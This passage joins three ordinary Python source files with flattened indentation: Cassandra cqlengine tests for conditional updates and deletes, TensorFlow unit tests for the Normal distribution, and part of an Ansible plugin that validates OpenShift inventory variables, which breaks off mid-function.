t.text = 'something else'
uid = t.id
with mock.patch.object(self.session, 'execute') as m:
TestConditionalModel.objects(id=uid).iff(text='blah blah').update(text='oh hey der')
args = m.call_args
self.assertIn('IF "text" = %(1)s', args[0][0].query_string)
def test_blind_update_fail(self):
t = TestConditionalModel.create(text='blah blah')
t.text = 'something else'
uid = t.id
qs = TestConditionalModel.objects(id=uid).iff(text='Not dis!')
with self.assertRaises(LWTException) as assertion:
qs.update(text='this will never work')
self.assertEqual(assertion.exception.existing, {
'text': 'blah blah',
'[applied]': False,
})
def test_conditional_clause(self):
tc = ConditionalClause('some_value', 23)
tc.set_context_id(3)
self.assertEqual('"some_value" = %(3)s', six.text_type(tc))
self.assertEqual('"some_value" = %(3)s', str(tc))
def test_batch_update_conditional(self):
t = TestConditionalModel.create(text='something', count=5)
id = t.id
with BatchQuery() as b:
t.batch(b).iff(count=5).update(text='something else')
updated = TestConditionalModel.objects(id=id).first()
self.assertEqual(updated.text, 'something else')
b = BatchQuery()
updated.batch(b).iff(count=6).update(text='and another thing')
with self.assertRaises(LWTException) as assertion:
b.execute()
self.assertEqual(assertion.exception.existing, {
'id': id,
'count': 5,
'[applied]': False,
})
updated = TestConditionalModel.objects(id=id).first()
self.assertEqual(updated.text, 'something else')
def test_delete_conditional(self):
# DML path
t = TestConditionalModel.create(text='something', count=5)
self.assertEqual(TestConditionalModel.objects(id=t.id).count(), 1)
with self.assertRaises(LWTException):
t.iff(count=9999).delete()
self.assertEqual(TestConditionalModel.objects(id=t.id).count(), 1)
t.iff(count=5).delete()
self.assertEqual(TestConditionalModel.objects(id=t.id).count(), 0)
# QuerySet path
t = TestConditionalModel.create(text='something', count=5)
self.assertEqual(TestConditionalModel.objects(id=t.id).count(), 1)
with self.assertRaises(LWTException):
TestConditionalModel.objects(id=t.id).iff(count=9999).delete()
self.assertEqual(TestConditionalModel.objects(id=t.id).count(), 1)
TestConditionalModel.objects(id=t.id).iff(count=5).delete()
self.assertEqual(TestConditionalModel.objects(id=t.id).count(), 0)
@greaterthancass20
def test_delete_lwt_ne(self):
"""
Test to ensure that deletes using IF and not equals are honored correctly
@since 3.2
@jira_ticket PYTHON-328
@expected_result Delete conditional with NE should be honored
@test_category object_mapper
"""
# DML path
t = TestConditionalModel.create(text='something', count=5)
self.assertEqual(TestConditionalModel.objects(id=t.id).count(), 1)
with self.assertRaises(LWTException):
t.iff(count__ne=5).delete()
t.iff(count__ne=2).delete()
self.assertEqual(TestConditionalModel.objects(id=t.id).count(), 0)
# QuerySet path
t = TestConditionalModel.create(text='something', count=5)
self.assertEqual(TestConditionalModel.objects(id=t.id).count(), 1)
with self.assertRaises(LWTException):
TestConditionalModel.objects(id=t.id).iff(count__ne=5).delete()
TestConditionalModel.objects(id=t.id).iff(count__ne=2).delete()
self.assertEqual(TestConditionalModel.objects(id=t.id).count(), 0)
@greaterthancass20
def test_update_lwt_ne(self):
"""
Test to ensure that update using IF and not equals are honored correctly
@since 3.2
@jira_ticket PYTHON-328
@expected_result update conditional with NE should be honored
@test_category object_mapper
"""
# DML path
t = TestConditionalModel.create(text='something', count=5)
self.assertEqual(TestConditionalModel.objects(id=t.id).count(), 1)
with self.assertRaises(LWTException):
t.iff(count__ne=5).update(text='nothing')
t.iff(count__ne=2).update(text='nothing')
self.assertEqual(TestConditionalModel.objects(id=t.id).first().text, 'nothing')
t.delete()
# QuerySet path
t = TestConditionalModel.create(text='something', count=5)
self.assertEqual(TestConditionalModel.objects(id=t.id).count(), 1)
with self.assertRaises(LWTException):
TestConditionalModel.objects(id=t.id).iff(count__ne=5).update(text='nothing')
TestConditionalModel.objects(id=t.id).iff(count__ne=2).update(text='nothing')
self.assertEqual(TestConditionalModel.objects(id=t.id).first().text, 'nothing')
t.delete()
def test_update_to_none(self):
# This test is done because updates to none are split into deletes
# for old versions of cassandra. Can be removed when we drop that code
# https://github.com/datastax/python-driver/blob/3.1.1/cassandra/cqlengine/query.py#L1197-L1200
# DML path
t = TestConditionalModel.create(text='something', count=5)
self.assertEqual(TestConditionalModel.objects(id=t.id).count(), 1)
with self.assertRaises(LWTException):
t.iff(count=9999).update(text=None)
self.assertIsNotNone(TestConditionalModel.objects(id=t.id).first().text)
t.iff(count=5).update(text=None)
self.assertIsNone(TestConditionalModel.objects(id=t.id).first().text)
# QuerySet path
t = TestConditionalModel.create(text='something', count=5)
self.assertEqual(TestConditionalModel.objects(id=t.id).count(), 1)
with self.assertRaises(LWTException):
TestConditionalModel.objects(id=t.id).iff(count=9999).update(text=None)
self.assertIsNotNone(TestConditionalModel.objects(id=t.id).first().text)
TestConditionalModel.objects(id=t.id).iff(count=5).update(text=None)
self.assertIsNone(TestConditionalModel.objects(id=t.id).first().text)
def test_column_delete_after_update(self):
# DML path
t = TestConditionalModel.create(text='something', count=5)
t.iff(count=5).update(text=None, count=6)
self.assertIsNone(t.text)
self.assertEqual(t.count, 6)
# QuerySet path
t = TestConditionalModel.create(text='something', count=5)
TestConditionalModel.objects(id=t.id).iff(count=5).update(text=None, count=6)
self.assertIsNone(TestConditionalModel.objects(id=t.id).first().text)
self.assertEqual(TestConditionalModel.objects(id=t.id).first().count, 6)
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for initializers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import importlib
import math
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import variables
from tensorflow.python.ops.distributions import kullback_leibler
from tensorflow.python.ops.distributions import normal as normal_lib
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
def try_import(name): # pylint: disable=invalid-name
module = None
try:
module = importlib.import_module(name)
except ImportError as e:
tf_logging.warning("Could not import %s: %s" % (name, str(e)))
return module
stats = try_import("scipy.stats")
class NormalTest(test.TestCase):
def setUp(self):
self._rng = np.random.RandomState(123)
def assertAllFinite(self, tensor):
is_finite = np.isfinite(tensor.eval())
all_true = np.ones_like(is_finite, dtype=np.bool)
self.assertAllEqual(all_true, is_finite)
def _testParamShapes(self, sample_shape, expected):
with self.test_session():
param_shapes = normal_lib.Normal.param_shapes(sample_shape)
mu_shape, sigma_shape = param_shapes["loc"], param_shapes["scale"]
self.assertAllEqual(expected, mu_shape.eval())
self.assertAllEqual(expected, sigma_shape.eval())
mu = array_ops.zeros(mu_shape)
sigma = array_ops.ones(sigma_shape)
self.assertAllEqual(
expected,
array_ops.shape(normal_lib.Normal(mu, sigma).sample()).eval())
def _testParamStaticShapes(self, sample_shape, expected):
param_shapes = normal_lib.Normal.param_static_shapes(sample_shape)
mu_shape, sigma_shape = param_shapes["loc"], param_shapes["scale"]
self.assertEqual(expected, mu_shape)
self.assertEqual(expected, sigma_shape)
def testParamShapes(self):
sample_shape = [10, 3, 4]
self._testParamShapes(sample_shape, sample_shape)
self._testParamShapes(constant_op.constant(sample_shape), sample_shape)
def testParamStaticShapes(self):
sample_shape = [10, 3, 4]
self._testParamStaticShapes(sample_shape, sample_shape)
self._testParamStaticShapes(
tensor_shape.TensorShape(sample_shape), sample_shape)
def testNormalWithSoftplusScale(self):
with self.test_session():
mu = array_ops.zeros((10, 3))
rho = array_ops.ones((10, 3)) * -2.
normal = normal_lib.NormalWithSoftplusScale(loc=mu, scale=rho)
self.assertAllEqual(mu.eval(), normal.loc.eval())
self.assertAllEqual(nn_ops.softplus(rho).eval(), normal.scale.eval())
def testNormalLogPDF(self):
with self.test_session():
batch_size = 6
mu = constant_op.constant([3.0] * batch_size)
sigma = constant_op.constant([math.sqrt(10.0)] * batch_size)
x = np.array([-2.5, 2.5, 4.0, 0.0, -1.0, 2.0], dtype=np.float32)
normal = normal_lib.Normal(loc=mu, scale=sigma)
log_pdf = normal.log_prob(x)
self.assertAllEqual(normal.batch_shape_tensor().eval(),
log_pdf.get_shape())
self.assertAllEqual(normal.batch_shape_tensor().eval(),
log_pdf.eval().shape)
self.assertAllEqual(normal.batch_shape, log_pdf.get_shape())
self.assertAllEqual(normal.batch_shape, log_pdf.eval().shape)
pdf = normal.prob(x)
self.assertAllEqual(normal.batch_shape_tensor().eval(), pdf.get_shape())
self.assertAllEqual(normal.batch_shape_tensor().eval(), pdf.eval().shape)
self.assertAllEqual(normal.batch_shape, pdf.get_shape())
self.assertAllEqual(normal.batch_shape, pdf.eval().shape)
if not stats:
return
expected_log_pdf = stats.norm(mu.eval(), sigma.eval()).logpdf(x)
self.assertAllClose(expected_log_pdf, log_pdf.eval())
self.assertAllClose(np.exp(expected_log_pdf), pdf.eval())
def testNormalLogPDFMultidimensional(self):
with self.test_session():
batch_size = 6
mu = constant_op.constant([[3.0, -3.0]] * batch_size)
sigma = constant_op.constant([[math.sqrt(10.0), math.sqrt(15.0)]] *
batch_size)
x = np.array([[-2.5, 2.5, 4.0, 0.0, -1.0, 2.0]], dtype=np.float32).T
normal = normal_lib.Normal(loc=mu, scale=sigma)
log_pdf = normal.log_prob(x)
log_pdf_values = log_pdf.eval()
self.assertEqual(log_pdf.get_shape(), (6, 2))
self.assertAllEqual(normal.batch_shape_tensor().eval(),
log_pdf.get_shape())
self.assertAllEqual(normal.batch_shape_tensor().eval(),
log_pdf.eval().shape)
self.assertAllEqual(normal.batch_shape, log_pdf.get_shape())
self.assertAllEqual(normal.batch_shape, log_pdf.eval().shape)
pdf = normal.prob(x)
pdf_values = pdf.eval()
self.assertEqual(pdf.get_shape(), (6, 2))
self.assertAllEqual(normal.batch_shape_tensor().eval(), pdf.get_shape())
self.assertAllEqual(normal.batch_shape_tensor().eval(), pdf_values.shape)
self.assertAllEqual(normal.batch_shape, pdf.get_shape())
self.assertAllEqual(normal.batch_shape, pdf_values.shape)
if not stats:
return
expected_log_pdf = stats.norm(mu.eval(), sigma.eval()).logpdf(x)
self.assertAllClose(expected_log_pdf, log_pdf_values)
self.assertAllClose(np.exp(expected_log_pdf), pdf_values)
def testNormalCDF(self):
with self.test_session():
batch_size = 50
mu = self._rng.randn(batch_size)
sigma = self._rng.rand(batch_size) + 1.0
x = np.linspace(-8.0, 8.0, batch_size).astype(np.float64)
normal = normal_lib.Normal(loc=mu, scale=sigma)
cdf = normal.cdf(x)
self.assertAllEqual(normal.batch_shape_tensor().eval(), cdf.get_shape())
self.assertAllEqual(normal.batch_shape_tensor().eval(), cdf.eval().shape)
self.assertAllEqual(normal.batch_shape, cdf.get_shape())
self.assertAllEqual(normal.batch_shape, cdf.eval().shape)
if not stats:
return
expected_cdf = stats.norm(mu, sigma).cdf(x)
self.assertAllClose(expected_cdf, cdf.eval(), atol=0)
def testNormalSurvivalFunction(self):
with self.test_session():
batch_size = 50
mu = self._rng.randn(batch_size)
sigma = self._rng.rand(batch_size) + 1.0
x = np.linspace(-8.0, 8.0, batch_size).astype(np.float64)
normal = normal_lib.Normal(loc=mu, scale=sigma)
sf = normal.survival_function(x)
self.assertAllEqual(normal.batch_shape_tensor().eval(), sf.get_shape())
self.assertAllEqual(normal.batch_shape_tensor().eval(), sf.eval().shape)
self.assertAllEqual(normal.batch_shape, sf.get_shape())
self.assertAllEqual(normal.batch_shape, sf.eval().shape)
if not stats:
return
expected_sf = stats.norm(mu, sigma).sf(x)
self.assertAllClose(expected_sf, sf.eval(), atol=0)
def testNormalLogCDF(self):
with self.test_session():
batch_size = 50
mu = self._rng.randn(batch_size)
sigma = self._rng.rand(batch_size) + 1.0
x = np.linspace(-100.0, 10.0, batch_size).astype(np.float64)
normal = normal_lib.Normal(loc=mu, scale=sigma)
cdf = normal.log_cdf(x)
self.assertAllEqual(normal.batch_shape_tensor().eval(), cdf.get_shape())
self.assertAllEqual(normal.batch_shape_tensor().eval(), cdf.eval().shape)
self.assertAllEqual(normal.batch_shape, cdf.get_shape())
self.assertAllEqual(normal.batch_shape, cdf.eval().shape)
if not stats:
return
expected_cdf = stats.norm(mu, sigma).logcdf(x)
self.assertAllClose(expected_cdf, cdf.eval(), atol=0, rtol=1e-5)
def testFiniteGradientAtDifficultPoints(self):
for dtype in [np.float32, np.float64]:
g = ops.Graph()
with g.as_default():
mu = variables.Variable(dtype(0.0))
sigma = variables.Variable(dtype(1.0))
dist = normal_lib.Normal(loc=mu, scale=sigma)
x = np.array([-100., -20., -5., 0., 5., 20., 100.]).astype(dtype)
for func in [
dist.cdf, dist.log_cdf, dist.survival_function,
dist.log_survival_function, dist.log_prob, dist.prob
]:
value = func(x)
grads = gradients_impl.gradients(value, [mu, sigma])
with self.test_session(graph=g):
variables.global_variables_initializer().run()
self.assertAllFinite(value)
self.assertAllFinite(grads[0])
self.assertAllFinite(grads[1])
def testNormalLogSurvivalFunction(self):
with self.test_session():
batch_size = 50
mu = self._rng.randn(batch_size)
sigma = self._rng.rand(batch_size) + 1.0
x = np.linspace(-10.0, 100.0, batch_size).astype(np.float64)
normal = normal_lib.Normal(loc=mu, scale=sigma)
sf = normal.log_survival_function(x)
self.assertAllEqual(normal.batch_shape_tensor().eval(), sf.get_shape())
self.assertAllEqual(normal.batch_shape_tensor().eval(), sf.eval().shape)
self.assertAllEqual(normal.batch_shape, sf.get_shape())
self.assertAllEqual(normal.batch_shape, sf.eval().shape)
if not stats:
return
expected_sf = stats.norm(mu, sigma).logsf(x)
self.assertAllClose(expected_sf, sf.eval(), atol=0, rtol=1e-5)
def testNormalEntropyWithScalarInputs(self):
# Scipy.stats.norm cannot deal with the shapes in the other test.
with self.test_session():
mu_v = 2.34
sigma_v = 4.56
normal = normal_lib.Normal(loc=mu_v, scale=sigma_v)
entropy = normal.entropy()
self.assertAllEqual(normal.batch_shape_tensor().eval(),
entropy.get_shape())
self.assertAllEqual(normal.batch_shape_tensor().eval(),
entropy.eval().shape)
self.assertAllEqual(normal.batch_shape, entropy.get_shape())
self.assertAllEqual(normal.batch_shape, entropy.eval().shape)
# scipy.stats.norm cannot deal with these shapes.
if not stats:
return
expected_entropy = stats.norm(mu_v, sigma_v).entropy()
self.assertAllClose(expected_entropy, entropy.eval())
def testNormalEntropy(self):
with self.test_session():
mu_v = np.array([1.0, 1.0, 1.0])
sigma_v = np.array([[1.0, 2.0, 3.0]]).T
normal = normal_lib.Normal(loc=mu_v, scale=sigma_v)
# scipy.stats.norm cannot deal with these shapes.
sigma_broadcast = mu_v * sigma_v
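      # Closed-form differential entropy of a Normal: H = 0.5 * ln(2 * pi * e * sigma^2).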
expected_entropy = 0.5 * np.log(2 * np.pi * np.exp(1) * sigma_broadcast**
2)
entropy = normal.entropy()
np.testing.assert_allclose(expected_entropy, entropy.eval())
self.assertAllEqual(normal.batch_shape_tensor().eval(),
entropy.get_shape())
self.assertAllEqual(normal.batch_shape_tensor().eval(),
entropy.eval().shape)
self.assertAllEqual(normal.batch_shape, entropy.get_shape())
self.assertAllEqual(normal.batch_shape, entropy.eval().shape)
def testNormalMeanAndMode(self):
with self.test_session():
# Mu will be broadcast to [7, 7, 7].
mu = [7.]
sigma = [11., 12., 13.]
normal = normal_lib.Normal(loc=mu, scale=sigma)
self.assertAllEqual((3,), normal.mean().get_shape())
self.assertAllEqual([7., 7, 7], normal.mean().eval())
self.assertAllEqual((3,), normal.mode().get_shape())
self.assertAllEqual([7., 7, 7], normal.mode().eval())
def testNormalQuantile(self):
with self.test_session():
batch_size = 52
mu = self._rng.randn(batch_size)
sigma = self._rng.rand(batch_size) + 1.0
p = np.linspace(0., 1.0, batch_size - 2).astype(np.float64)
# Quantile performs piecewise rational approximation so adding some
# special input values to make sure we hit all the pieces.
p = np.hstack((p, np.exp(-33), 1. - np.exp(-33)))
normal = normal_lib.Normal(loc=mu, scale=sigma)
x = normal.quantile(p)
self.assertAllEqual(normal.batch_shape_tensor().eval(), x.get_shape())
self.assertAllEqual(normal.batch_shape_tensor().eval(), x.eval().shape)
self.assertAllEqual(normal.batch_shape, x.get_shape())
self.assertAllEqual(normal.batch_shape, x.eval().shape)
if not stats:
return
expected_x = stats.norm(mu, sigma).ppf(p)
self.assertAllClose(expected_x, x.eval(), atol=0.)
def _baseQuantileFiniteGradientAtDifficultPoints(self, dtype):
g = ops.Graph()
with g.as_default():
mu = variables.Variable(dtype(0.0))
sigma = variables.Variable(dtype(1.0))
dist = normal_lib.Normal(loc=mu, scale=sigma)
p = variables.Variable(
np.array([0.,
np.exp(-32.), np.exp(-2.),
1. - np.exp(-2.), 1. - np.exp(-32.),
1.]).astype(dtype))
value = dist.quantile(p)
grads = gradients_impl.gradients(value, [mu, p])
with self.test_session(graph=g):
variables.global_variables_initializer().run()
self.assertAllFinite(grads[0])
self.assertAllFinite(grads[1])
def testQuantileFiniteGradientAtDifficultPointsFloat32(self):
self._baseQuantileFiniteGradientAtDifficultPoints(np.float32)
def testQuantileFiniteGradientAtDifficultPointsFloat64(self):
self._baseQuantileFiniteGradientAtDifficultPoints(np.float64)
def testNormalVariance(self):
with self.test_session():
# sigma will be broadcast to [7, 7, 7]
mu = [1., 2., 3.]
sigma = [7.]
normal = normal_lib.Normal(loc=mu, scale=sigma)
self.assertAllEqual((3,), normal.variance().get_shape())
self.assertAllEqual([49., 49, 49], normal.variance().eval())
def testNormalStandardDeviation(self):
with self.test_session():
# sigma will be broadcast to [7, 7, 7]
mu = [1., 2., 3.]
sigma = [7.]
normal = normal_lib.Normal(loc=mu, scale=sigma)
self.assertAllEqual((3,), normal.stddev().get_shape())
self.assertAllEqual([7., 7, 7], normal.stddev().eval())
def testNormalSample(self):
with self.test_session():
mu = constant_op.constant(3.0)
sigma = constant_op.constant(math.sqrt(3.0))
mu_v = 3.0
sigma_v = np.sqrt(3.0)
n = constant_op.constant(100000)
normal = normal_lib.Normal(loc=mu, scale=sigma)
samples = normal.sample(n)
sample_values = samples.eval()
# Note that the standard error for the sample mean is ~ sigma / sqrt(n).
# The sample variance similarly is dependent on sigma and n.
# Thus, the tolerances below are very sensitive to number of samples
# as well as the variances chosen.
self.assertEqual(sample_values.shape, (100000,))
self.assertAllClose(sample_values.mean(), mu_v, atol=1e-1)
self.assertAllClose(sample_values.std(), sigma_v, atol=1e-1)
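      # Illustrative sanity check of the tolerance above: with n = 100000 and
      # sigma = sqrt(3) ~ 1.73, the standard error of the sample mean is
      # sigma / sqrt(n) ~ 0.0055, so atol=1e-1 leaves a very wide margin.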
expected_samples_shape = tensor_shape.TensorShape([n.eval()]).concatenate(
tensor_shape.TensorShape(normal.batch_shape_tensor().eval()))
self.assertAllEqual(expected_samples_shape, samples.get_shape())
self.assertAllEqual(expected_samples_shape, sample_values.shape)
expected_samples_shape = (tensor_shape.TensorShape(
[n.eval()]).concatenate(normal.batch_shape))
self.assertAllEqual(expected_samples_shape, samples.get_shape())
self.assertAllEqual(expected_samples_shape, sample_values.shape)
def testNormalSampleMultiDimensional(self):
with self.test_session():
batch_size = 2
mu = constant_op.constant([[3.0, -3.0]] * batch_size)
sigma = constant_op.constant([[math.sqrt(2.0), math.sqrt(3.0)]] *
batch_size)
mu_v = [3.0, -3.0]
sigma_v = [np.sqrt(2.0), np.sqrt(3.0)]
n = constant_op.constant(100000)
normal = normal_lib.Normal(loc=mu, scale=sigma)
samples = normal.sample(n)
sample_values = samples.eval()
# Note that the standard error for the sample mean is ~ sigma / sqrt(n).
# The sample variance similarly is dependent on sigma and n.
# Thus, the tolerances below are very sensitive to number of samples
# as well as the variances chosen.
self.assertEqual(samples.get_shape(), (100000, batch_size, 2))
self.assertAllClose(sample_values[:, 0, 0].mean(), mu_v[0], atol=1e-1)
self.assertAllClose(sample_values[:, 0, 0].std(), sigma_v[0], atol=1e-1)
self.assertAllClose(sample_values[:, 0, 1].mean(), mu_v[1], atol=1e-1)
self.assertAllClose(sample_values[:, 0, 1].std(), sigma_v[1], atol=1e-1)
expected_samples_shape = tensor_shape.TensorShape([n.eval()]).concatenate(
tensor_shape.TensorShape(normal.batch_shape_tensor().eval()))
self.assertAllEqual(expected_samples_shape, samples.get_shape())
self.assertAllEqual(expected_samples_shape, sample_values.shape)
expected_samples_shape = (tensor_shape.TensorShape(
[n.eval()]).concatenate(normal.batch_shape))
self.assertAllEqual(expected_samples_shape, samples.get_shape())
self.assertAllEqual(expected_samples_shape, sample_values.shape)
def testNegativeSigmaFails(self):
with self.test_session():
normal = normal_lib.Normal(
loc=[1.], scale=[-5.], validate_args=True, name="G")
with self.assertRaisesOpError("Condition x > 0 did not hold"):
normal.mean().eval()
def testNormalShape(self):
with self.test_session():
mu = constant_op.constant([-3.0] * 5)
sigma = constant_op.constant(11.0)
normal = normal_lib.Normal(loc=mu, scale=sigma)
self.assertEqual(normal.batch_shape_tensor().eval(), [5])
self.assertEqual(normal.batch_shape, tensor_shape.TensorShape([5]))
self.assertAllEqual(normal.event_shape_tensor().eval(), [])
self.assertEqual(normal.event_shape, tensor_shape.TensorShape([]))
def testNormalShapeWithPlaceholders(self):
mu = array_ops.placeholder(dtype=dtypes.float32)
sigma = array_ops.placeholder(dtype=dtypes.float32)
normal = normal_lib.Normal(loc=mu, scale=sigma)
with self.test_session() as sess:
      # batch_shape should be an unknown TensorShape at graph construction time.
self.assertEqual(normal.batch_shape, tensor_shape.TensorShape(None))
self.assertEqual(normal.event_shape, ())
self.assertAllEqual(normal.event_shape_tensor().eval(), [])
self.assertAllEqual(
sess.run(normal.batch_shape_tensor(),
feed_dict={mu: 5.0,
sigma: [1.0, 2.0]}), [2])
def testNormalNormalKL(self):
with self.test_session() as sess:
batch_size = 6
mu_a = np.array([3.0] * batch_size)
sigma_a = np.array([1.0, 2.0, 3.0, 1.5, 2.5, 3.5])
mu_b = np.array([-3.0] * batch_size)
sigma_b = np.array([0.5, 1.0, 1.5, 2.0, 2.5, 3.0])
n_a = normal_lib.Normal(loc=mu_a, scale=sigma_a)
n_b = normal_lib.Normal(loc=mu_b, scale=sigma_b)
kl = kullback_leibler.kl_divergence(n_a, n_b)
kl_val = sess.run(kl)
kl_expected = ((mu_a - mu_b)**2 / (2 * sigma_b**2) + 0.5 * (
(sigma_a**2 / sigma_b**2) - 1 - 2 * np.log(sigma_a / sigma_b)))
self.assertEqual(kl.get_shape(), (batch_size,))
self.assertAllClose(kl_val, kl_expected)
if __name__ == "__main__":
test.main()
|
|
"""
Ansible action plugin to ensure inventory variables are set
appropriately and no conflicting options have been provided.
"""
import json
import re
from ansible.plugins.action import ActionBase
from ansible import errors
# pylint: disable=import-error,no-name-in-module
from ansible.module_utils.six.moves.urllib.parse import urlparse
# Valid values for openshift_deployment_type
VALID_DEPLOYMENT_TYPES = ('origin', 'openshift-enterprise')
# Tuple of variable names and default values if undefined.
NET_PLUGIN_LIST = (('openshift_use_openshift_sdn', True),
('openshift_use_flannel', False),
('openshift_use_nuage', False),
('openshift_use_contiv', False),
('openshift_use_calico', False),
('openshift_use_kuryr', False))
ENTERPRISE_TAG_REGEX_ERROR = """openshift_image_tag must be in the format
v#.#[.#[.#]]. Examples: v1.2, v3.4.1, v3.5.1.3,
v3.5.1.3.4, v1.2-1, v1.2.3-4, v1.2.3-4.5, v1.2.3-4.5.6
You specified openshift_image_tag={}"""
ORIGIN_TAG_REGEX_ERROR = """openshift_image_tag must be in the format
v#.#[.#-optional.#]. Examples: v1.2.3, v3.5.1-alpha.1
You specified openshift_image_tag={}"""
ORIGIN_TAG_REGEX = {'re': '(^v?\\d+\\.\\d+.*)',
'error_msg': ORIGIN_TAG_REGEX_ERROR}
ENTERPRISE_TAG_REGEX = {'re': '(^v\\d+\\.\\d+(\\.\\d+)*(-\\d+(\\.\\d+)*)?$)',
'error_msg': ENTERPRISE_TAG_REGEX_ERROR}
IMAGE_TAG_REGEX = {'origin': ORIGIN_TAG_REGEX,
'openshift-enterprise': ENTERPRISE_TAG_REGEX}
PKG_VERSION_REGEX_ERROR = """openshift_pkg_version must be in the format
-[optional.release]. Examples: -3.6.0, -3.7.0-0.126.0.git.0.9351aae.el7 -3.11*
You specified openshift_pkg_version={}"""
PKG_VERSION_REGEX = {'re': '(^-.*)',
'error_msg': PKG_VERSION_REGEX_ERROR}
RELEASE_REGEX_ERROR = """openshift_release must be in the format
v#[.#[.#]]. Examples: v3.9, v3.10.0
You specified openshift_release={}"""
RELEASE_REGEX = {'re': '(^v?\\d+(\\.\\d+(\\.\\d+)?)?$)',
'error_msg': RELEASE_REGEX_ERROR}
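# Illustrative matches for the regexes above (hypothetical values, not used
# by the plugin itself):
#   ORIGIN_TAG_REGEX      matches "v1.2.3" and "v3.5.1-alpha.1"
#   ENTERPRISE_TAG_REGEX  matches "v3.5.1.3" and "v1.2.3-4.5", but not "latest"
#   PKG_VERSION_REGEX     matches "-3.6.0" (the value must start with "-")
#   RELEASE_REGEX         matches "v3.9" and "3.10.0", but not "3.10.0-rc1"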
STORAGE_KIND_TUPLE = (
'openshift_hosted_registry_storage_kind',
'openshift_loggingops_storage_kind',
'openshift_logging_storage_kind',
'openshift_metrics_storage_kind',
'openshift_prometheus_alertbuffer_storage_kind',
'openshift_prometheus_alertmanager_storage_kind',
'openshift_prometheus_storage_kind')
IMAGE_POLICY_CONFIG_VAR = "openshift_master_image_policy_config"
ALLOWED_REGISTRIES_VAR = "openshift_master_image_policy_allowed_registries_for_import"
REMOVED_VARIABLES = (
# TODO(michaelgugino): Remove in 3.12
('oreg_auth_credentials_replace', 'Removed: Credentials are now always updated'),
('oreg_url_master', 'oreg_url'),
('oreg_url_node', 'oreg_url'),
)
# JSON_FORMAT_VARIABLES is not intended to cover all json variables; it covers
# the more complicated json variables found in hosts.example.
JSON_FORMAT_VARIABLES = (
'openshift_builddefaults_json',
'openshift_buildoverrides_json',
'openshift_master_admission_plugin_config',
'openshift_master_audit_config',
'openshift_crio_docker_gc_node_selector',
'openshift_master_image_policy_allowed_registries_for_import',
'openshift_master_image_policy_config',
'openshift_master_oauth_templates',
'container_runtime_extra_storage',
'openshift_additional_repos',
'openshift_master_identity_providers',
'openshift_master_htpasswd_users',
'openshift_additional_projects',
'openshift_hosted_routers',
'openshift_node_open_ports',
'openshift_master_open_ports',
)
def to_bool(var_to_check):
"""Determine a boolean value given the multiple
ways bools can be specified in ansible."""
# http://yaml.org/type/bool.html
yes_list = (True, 1, "True", "1", "true", "TRUE",
"Yes", "yes", "Y", "y", "YES",
"on", "ON", "On")
return var_to_check in yes_list
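# Illustrative behaviour of to_bool (examples only, not exercised here):
#   to_bool("Yes")   -> True
#   to_bool(1)       -> True
#   to_bool("false") -> False  (anything not in yes_list, e.g. "no" or 0, is False)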
def check_for_removed_vars(hostvars, host):
"""Fails if removed variables are found"""
found_removed = []
for item in REMOVED_VARIABLES:
        if item[0] in hostvars[host]:
found_removed.append(item)
if found_removed:
msg = "Found removed variables: "
for item in found_removed:
msg += "{} is replaced by {}; ".format(item[0], item[1])
raise errors.AnsibleModuleError(msg)
return None
class ActionModule(ActionBase):
"""Action plugin to execute sanity checks."""
def template_var(self, hostvars, host, varname):
"""Retrieve a variable from hostvars and template it.
If undefined, return None type."""
# We will set the current host and variable checked for easy debugging
# if there are any unhandled exceptions.
# pylint: disable=W0201
self.last_checked_var = varname
# pylint: disable=W0201
self.last_checked_host = host
res = hostvars[host].get(varname)
if res is None:
return None
return self._templar.template(res)
def check_openshift_deployment_type(self, hostvars, host):
"""Ensure a valid openshift_deployment_type is set"""
openshift_deployment_type = self.template_var(hostvars, host,
'openshift_deployment_type')
if openshift_deployment_type not in VALID_DEPLOYMENT_TYPES:
type_strings = ", ".join(VALID_DEPLOYMENT_TYPES)
msg = "openshift_deployment_type must be defined and one of {}".format(type_strings)
raise errors.AnsibleModuleError(msg)
return openshift_deployment_type
def get_allowed_registries(self, hostvars, host):
"""Returns a list of configured allowedRegistriesForImport as a list of patterns"""
allowed_registries_for_import = self.template_var(hostvars, host, ALLOWED_REGISTRIES_VAR)
if allowed_registries_for_import is None:
image_policy_config = self.template_var(hostvars, host, IMAGE_POLICY_CONFIG_VAR)
if not image_policy_config:
return image_policy_config
if isinstance(image_policy_config, str):
try:
image_policy_config = json.loads(image_policy_config)
except Exception:
raise errors.AnsibleModuleError(
"{} is not a valid json string".format(IMAGE_POLICY_CONFIG_VAR))
if not isinstance(image_policy_config, dict):
raise errors.AnsibleModuleError(
"expected dictionary for {}, not {}".format(
IMAGE_POLICY_CONFIG_VAR, type(image_policy_config)))
detailed = image_policy_config.get("allowedRegistriesForImport", None)
if not detailed:
return detailed
if not isinstance(detailed, list):
                raise errors.AnsibleModuleError("expected list for {}['{}'], not {}".format(
                    IMAGE_POLICY_CONFIG_VAR, "allowedRegistriesForImport",
                    type(detailed)))
try:
return [i["domainName"] for i in detailed]
except Exception:
raise errors.AnsibleModuleError(
"each item of allowedRegistriesForImport must be a dictionary with 'domainName' key")
if not isinstance(allowed_registries_for_import, list):
            raise errors.AnsibleModuleError("expected list for {}, not {}".format(
                ALLOWED_REGISTRIES_VAR, type(allowed_registries_for_import)))
return allowed_registries_for_import
def check_whitelisted_registries(self, hostvars, host):
"""Ensure defined registries are whitelisted"""
allowed = self.get_allowed_registries(hostvars, host)
if allowed is None:
return
unmatched_registries = []
        for regvar in (
                "oreg_url",
                "openshift_cockpit_deployer_prefix",
                "openshift_metrics_image_prefix",
                "openshift_logging_image_prefix",
                "openshift_service_catalog_image_prefix",
                "openshift_docker_insecure_registries"):
value = self.template_var(hostvars, host, regvar)
